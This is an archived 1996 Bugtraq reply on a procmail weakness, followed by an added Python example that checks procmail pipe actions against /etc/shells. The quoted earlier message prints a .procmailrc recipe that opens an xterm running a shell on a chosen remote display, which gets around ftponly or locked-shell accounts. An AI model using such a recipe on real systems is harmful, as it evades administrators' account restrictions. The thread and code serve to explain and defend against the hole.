Bugtraq mailing list archives
Re: procmail
From: Kari.Hurtta () dionysos fmi fi (Kari E. Hurtta)
Date: Wed, 7 Aug 1996 08:47:26 +0300
Neil Soveran-Charley wrote:
> > hi there, I just heard from a friend that there is a bug in procmail
> > which allows anyone to open an xterm window from any m/c. has anyone
> > heard of this if so can u post the details and the xploit
> > thanx
> > danny
>
> NB: This isn't a 'hack an account' hole. However if you have 'ftponly' accounts, i.e. people grab email via pop, but also have ftp access for maintaining their web pages, with a 'shell' that prints a message and exits, then the following is possible to work around such security...
>
> I think there may well be such an exploit. I'd guess it is simply something like:
>
> (.procmailrc contents)
> :0 Hc
> * ^Subject:.*APassword
> /usr/bin/X11/xterm -display <some display> -e <a shell>
> (end .procmailrc)
>
> Then email yourself with something with the password in the subject line and an xterm gets popped up on the display, running the given shell, thus bypassing any 'locked account' or 'ftponly' shells...
>
> I'm sure procmail MUST have some security feature to disallow this sort of thing? But I could be wrong, and haven't checked the manual pages yet.

Sendmail disallows this sort of thing by not allowing pipes in .forward if the user does not have a valid shell (listed in /etc/shells). Yes, if you use procmail as the local delivery agent, then you need the same kind of mechanism in procmail also (if it allows piping mail to programs).
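
The rule described in the reply above (no program delivery for a user whose shell is not listed in /etc/shells), applied to procmail pipe actions, as an added example that is not part of the original post and is not sendmail or procmail code. The account names, paths and sample files are constructed, and only `|` action lines are checked.

```python
# Constructed sample inputs (not from the post); names and paths are assumptions.
SHELLS = "# valid login shells\n/bin/sh\n/bin/csh\n"
PASSWD = ("alice:x:1001:100:Alice:/home/alice:/bin/csh\n"
          "webftp:x:1002:100:FTP only:/home/webftp:/usr/local/bin/ftponly\n"
          "nosh:x:1003:100:Empty shell:/home/nosh:\n")
RC = (":0 c\n* ^Subject:.*vacation\n| /usr/bin/vacation webftp\n\n"
      ":0\n* ^From:.*list\nlists/\n")

def valid_shells(shells_text):
    """Parse /etc/shells text: one absolute path per line, '#' starts a comment."""
    shells = set()
    for line in shells_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line.startswith("/"):
            shells.add(line)
    return shells

def login_shell(passwd_text, user):
    """Return the user's shell from passwd(5) text, or None for an unknown user."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            return fields[6] or "/bin/sh"  # passwd(5): empty field means /bin/sh
    return None

def may_run_programs(user, passwd_text=PASSWD, shells_text=SHELLS):
    """True only if the account exists and its shell is listed in /etc/shells."""
    shell = login_shell(passwd_text, user)
    return shell is not None and shell in valid_shells(shells_text)

def program_actions(rc_text):
    """Return recipe action lines that pipe the message to a program."""
    actions, in_recipe = [], False
    for raw in rc_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith(":0"):
            in_recipe = True       # recipe header; conditions and action follow
        elif in_recipe and not line.startswith("*"):
            in_recipe = False      # first non-condition line is the action
            if line.startswith("|"):
                actions.append(line)
    return actions

def refused_actions(user, rc_text, passwd_text=PASSWD, shells_text=SHELLS):
    """Pipe actions that a delivery agent applying the /etc/shells rule would refuse."""
    if may_run_programs(user, passwd_text, shells_text):
        return []
    return program_actions(rc_text)
```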